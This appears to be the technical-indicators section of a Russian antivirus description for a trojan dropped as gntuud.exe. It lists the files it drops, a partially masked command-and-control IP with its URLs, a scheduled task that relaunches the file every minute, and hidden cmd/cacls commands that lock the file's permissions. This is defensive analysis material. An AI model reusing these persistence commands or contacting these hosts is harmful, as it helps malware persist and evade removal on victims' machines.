Техническая информация
- <SYSTEM32>\tasks\gntuud.exe
- %TEMP%\acc0b83959\gntuud.exe
- %TEMP%\960123792202
- %TEMP%\960123792202
- '85.##9.135.11':80
- http://85.##9.135.11/gjend7w/index.php
- http://85.##9.135.11/gjend7w/index.php?sc###
- '%TEMP%\acc0b83959\gntuud.exe'
- '%TEMP%\acc0b83959\gntuud.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "%TEMP%\acc0b83959\gntuud.exe" /F' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\acc0b83959" /P "user:N"&&CACLS "..\acc0b83959" /P "user:R" /E&&Exit' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "%TEMP%\acc0b83959\gntuud.exe" /F
- '%WINDIR%\syswow64\cmd.exe' /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\acc0b83959" /P "user:N"&&CACLS "..\acc0b83959" /P "user:R" /E&&Exit
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo Y"
- '%WINDIR%\syswow64\cacls.exe' "gntuud.exe" /P "user:N"
- '%WINDIR%\syswow64\cacls.exe' "gntuud.exe" /P "user:R" /E
- '%WINDIR%\syswow64\cacls.exe' "..\acc0b83959" /P "user:N"
- '%WINDIR%\syswow64\cacls.exe' "..\acc0b83959" /P "user:R" /E
- '<SYSTEM32>\taskeng.exe' {0CBF91DF-52E2-4A59-9BB9-E691609C1DE5} S-1-5-21-1960123792-2022915161-3775307078-1001:aaeihaena\user:Interactive:[1]